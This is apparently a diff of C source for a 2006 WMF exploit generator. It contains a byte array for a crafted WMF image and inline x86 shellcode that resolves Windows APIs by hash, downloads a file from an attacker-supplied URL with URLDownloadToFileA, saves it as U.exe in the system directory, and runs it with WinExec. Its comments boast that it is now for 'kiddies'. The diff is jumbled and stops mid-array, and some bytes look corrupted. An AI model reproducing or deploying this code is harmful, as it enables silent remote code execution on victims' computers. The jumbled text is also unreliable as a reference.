0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00, - 0x00, 0x00, 0x32, 0x0A, 0xDF, 0x01, 0x63, 0x02, 0x12, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, - 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x0B, 0x00, - 0x08, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00, - 0x0C, 0x00, 0x05, 
0x00, 0x07, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00, - 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0xD2, 0x01, - 0x0B, 0x00, 0x00, 0x00, 0x54, 0x52, 0x41, 0x49, 0x4C, 0x20, 0x3D, 0x20, 0x54, 0x4E, 0x46, 0x00, - 0x0D, 0x00, 0x10, 0x00, 0x10, 0x00, 0x07, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00, - 0x73, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, - 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0xA7, 0x0A, - 0xF9, 0x01, 0x57, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, - 0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0x5E, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65, - 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, - 0x08, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, - 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x06, 0x00, - 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 
0xFF, 0xFF, 0x02, 0x05, 0x09, 0x00, 0x00, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0xF8, 0x02, - 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, - 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, - 0x32, 0x0A, 0xF9, 0x01, 0x00, 0x03, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, - 0x65, 0x65, 0x06, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x0B, 0x00, - 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x13, 0x02, 0xD2, 0x01, - 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x06, 0x00, 0x05, 0x00, 0x0B, 0x00, - 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, - 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0xAD, 0x00, 0x00, 0x00, 0x32, 0x0A, - 0x2C, 0x02, 0xD2, 0x01, 0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x3D, 0x00, - 0x0D, 0x00, 0x10, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0C, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 
0x00, - 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, - 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0xD8, 0x02, 0x01, - 0x01, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x32, 0x02, 0x03, 0x00, 0x00, 0x00, - 0x54, 0x64, 0x54, 0x00, 0x0E, 0x00, 0x0C, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, - 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, - 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x59, 0x02, 0x01, 0x7D, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0xBA, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, - 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, - 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x61, 0x02, 0x08, 0x00, - 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x11, 0x00, 0x0A, 0x00, 0x0C, 0x00, - 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, - 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00, - 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0xBB, 0x02, 0x04, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, - 0x0B, 0x00, 0x10, 0x00, 0x0D, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, - 0xFF, 0x02, 0x05, 0x00, 0x00, 
0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, - 0x32, 0x0A, 0x2C, 0x02, 0xF6, 0x02, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, - 0x65, 0x65, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0C, 0x00, - 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x43, 0x03, - 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, - 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, - 0x32, 0x0A, 0x46, 0x02, 0xD2, 0x01, 0x09, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, - 0x65, 0x65, 0x20, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00, - 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, - 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x32, 0x0A, - 0x60, 0x02, 0xD2, 0x01, 0x04, 0x00, 0x00, 0x00, 0x7A, 0x56, 0x41, 0x44, 0x09, 0x00, 0x0F, 0x00, - 0x0F, 0x00, 0x10, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 
0xFF, 0xFF, 0x02, 0x05, 0x00, - 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, - 0x09, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, - 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0C, 0x3F, - 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x0E, 0x02, 0x03, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x00, - 0x08, 0x00, 0x12, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x30, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, - 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, - 0x60, 0x02, 0x38, 0x02, 0x01, 0x00, 0x00, 0x00, 0x3D, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, - 0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x4A, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65, - 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, - 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0xAF, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, - 0x0A, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, - 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 
0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0xDD, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0xF6, 0x02, - 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, - 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, - 0x32, 0x0A, 0x60, 0xEB, 0xFD, 0x02, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, - 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, - 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x34, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, - 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x3B, 0x03, - 0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, 0x0B, 0x00, 0x05, 0x00, - 0x0C, 0x00, 0x0C, 0x4F, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, - 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 
0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, - 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x7D, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, - 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, - 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0xF7, 0x62, 0x00, - 0x02, 0x01, 0x01, 0x00, 0x31, 0x00, 0x00, 0xC3, 0x32, 0x0A, 0x79, 0x02, 0xD2, 0x01, 0x1C, 0x00, - 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, - 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0B, 0x00, - 0x08, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00, - 0x05, 0x00, 0x08, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x11, 0x00, - 0x0A, 0x00, 0x08, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, - 0x0C, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x10, 0x00, - 0x00, 0x00, 0xFB, 0x02, 0x10, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, - 0x00, 0xEE, 0x01, 0x02, 0x02, 0x22, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x00, 0xEE, 0x04, 0x00, - 0x00, 0x00, 0x2D, 0x01, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x0F, 0x00, - 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, - 0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x00, 
0x00, 0x03, 0x00, - 0x00, 0x00, 0x00, 0x00 -}; - - -// Shellcode string -unsigned char sc[1024] = {0}; -unsigned int Sc_len; - -// ASM shellcode main function -void ShellCode(); - -// Get function hash -static DWORD __stdcall GetHash ( char *c ) -{ - DWORD h = 0; - - while ( *c ) - { - __asm ror h, HASH_KEY - - h += *c++; - } - return( h ); -} - -void Make_ShellCode(char *url1) -{ - unsigned char *pSc_addr; - unsigned int Enc_key=ENC_KEY; - unsigned long dwHash[100]; - unsigned int dwHashSize; - int i,j,k,l; - - - // Get functions hash - //printf("[+] Get functions hash strings.\r\n"); - for (i=0;;i++) - { - if (functions[i][0] == '\x0') break; - - dwHash[i] = GetHash((char*)functions[i]); - //printf("\t%.8X\t%s\n", dwHash[i], functions[i]); - } - dwHashSize = i*4; - - - // Deal with shellcode - pSc_addr = (unsigned char *)ShellCode; - - for (k=0;k0; i--) - { - l = 0; - for(j=DECODE_LEN; j ebx) - dec ebx - xor ecx,ecx - mov cl,0xFF // Decode len - - decode_loop: - xor byte ptr [ebx+ecx],ENC_KEY // Decode key - loop decode_loop - jmp short decode_ok - -decode_end: - call decode_start - -decode_ok: - -//-------------------------------------------------------------------- -// -// ShellCode -// -//-------------------------------------------------------------------- - jmp sc_end - -sc_start: - pop edi // Hash string start addr (esp -> edi) - - // Get kernel32.dll base addr - mov eax, fs:0x30 // PEB - mov eax, [eax+0x0c] // PROCESS_MODULE_INFO - mov esi, [eax+0x1c] // InInitOrder.flink - lodsd // eax = InInitOrder.blink - mov ebp, [eax+8] // ebp = kernel32.dll base address - - mov esi, edi // Hash string start addr -> esi - - // Get function addr of kernel32 - push 4 - pop ecx - - getkernel32: - call GetProcAddress_fun - loop getkernel32 - - // Get function addr of urlmon - push 0x00006e6f - push 0x6d6c7275 // urlmon - push esp - call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); - - mov ebp, eax // ebp = urlmon.dll base address - -/* - push 1 - pop ecx - - geturlmon: - 
call GetProcAddress_fun - loop geturlmon -*/ - call GetProcAddress_fun - - // url start addr = edi - -LGetSystemDirectoryA: - sub esp, 0x20 - mov ebx, esp - - push 0x20 - push ebx - call ADDR_GetSystemDirectoryA // GetSystemDirectoryA - -LURLDownloadToFileA: - // eax = system path size - // URLDownloadToFileA url save to a.exe - mov dword ptr [ebx+eax], 0x652E555C // "\U.e" - mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" - xor eax, eax - push eax - push eax - push ebx // %systemdir%\U.exe - push edi // url - push eax -call ADDR_URLDownloadToFileA // URLDownloadToFileA - -//LWinExec: - mov ebx, esp - push 1//executes in SW_SHOW, push 0 if you wanna in SW_HIDE.. - push ebx - call ADDR_WinExec // WinExec(%systemdir%\a.exe); - -Finished: - //push 1 - call ADDR_ExitProcess // ExitProcess(); - -GetProcAddress_fun: - push ecx - push esi - - mov esi, [ebp+0x3C] // e_lfanew - mov esi, [esi+ebp+0x78] // ExportDirectory RVA - add esi, ebp // rva2va - push esi - mov esi, [esi+0x20] // AddressOfNames RVA - add esi, ebp // rva2va - xor ecx, ecx - dec ecx - - find_start: - inc ecx - lodsd - add eax, ebp - xor ebx, ebx - - hash_loop: - movsx edx, byte ptr [eax] - cmp dl, dh - jz short find_addr - ror ebx, HASH_KEY // hash key - add ebx, edx - inc eax - jmp short hash_loop - - find_addr: - cmp ebx, [edi] // compare to hash - jnz short find_start - pop esi // ExportDirectory - mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA - add ebx, ebp // rva2va - mov cx, [ebx+ecx*2] // FunctionOrdinal - mov ebx, [esi+0x1C] // AddressOfFunctions RVA - add ebx, ebp // rva2va - mov eax, [ebx+ecx*4] // FunctionAddress RVA - add eax, ebp // rva2va - stosd // function address save to [edi] - - pop esi - pop ecx - ret - -sc_end: - call sc_start - - PROC_END //C macro to end proc - } -} - -// milw0rm.com [2006-01-15] +/* +\ +/ WMF nDay download() Exploit Generator +\ by Unl0ck Research Team +/ +\ +/ greetz: + rst/ghc { ed, uf0, fost }, + uKt { choix, nekd0, payhash, antq }, + blacksecurity { #black } 
, + 0x557 { kaka, swan, sam, nolife }, + sowhat, tty64 { izik }; + + This sploit is now full shit, so... + kiddies party has been started!!! + +urs, +darkeagle +\ +/ +*/ + +#include +#include + +#pragma comment(lib, "ws2_32") + +// Use for find the ASM code +#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\ + __asm _emit 0x90 __asm _emit 0x90\ + __asm _emit 0x90 __asm _emit 0x90\ + __asm _emit 0x90 __asm _emit 0x90 +#define PROC_END PROC_BEGIN +#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90" +#define SEARCH_LEN 8 +#define MAX_SC_LEN 2048 +#define HASH_KEY 13 + +// Define Decode Parameter +#define DECODE_LEN 21 +#define SC_LEN_OFFSET 7 +#define ENC_KEY_OFFSET 11 +#define ENC_KEY 0xff + + +// Define Function Addr +#define ADDR_LoadLibraryA [esi] +#define ADDR_GetSystemDirectoryA [esi+4] +#define ADDR_WinExec [esi+8] +#define ADDR_ExitProcess [esi+12] +#define ADDR_URLDownloadToFileA [esi+16] + +// Need functions +unsigned char functions[100][128] = +{ // [esi] stack layout + // kernel32 4 // 00 kernel32.dll + {"LoadLibraryA"}, // [esi] + {"GetSystemDirectoryA"}, // [esi+4] + {"WinExec"}, // [esi+8] + {"ExitProcess"}, // [esi+12] + // urlmon 1 // 01 urlmon.dll + {"URLDownloadToFileA"}, // [esi+16] + {""}, +}; + + + +unsigned char head1[512] = { + 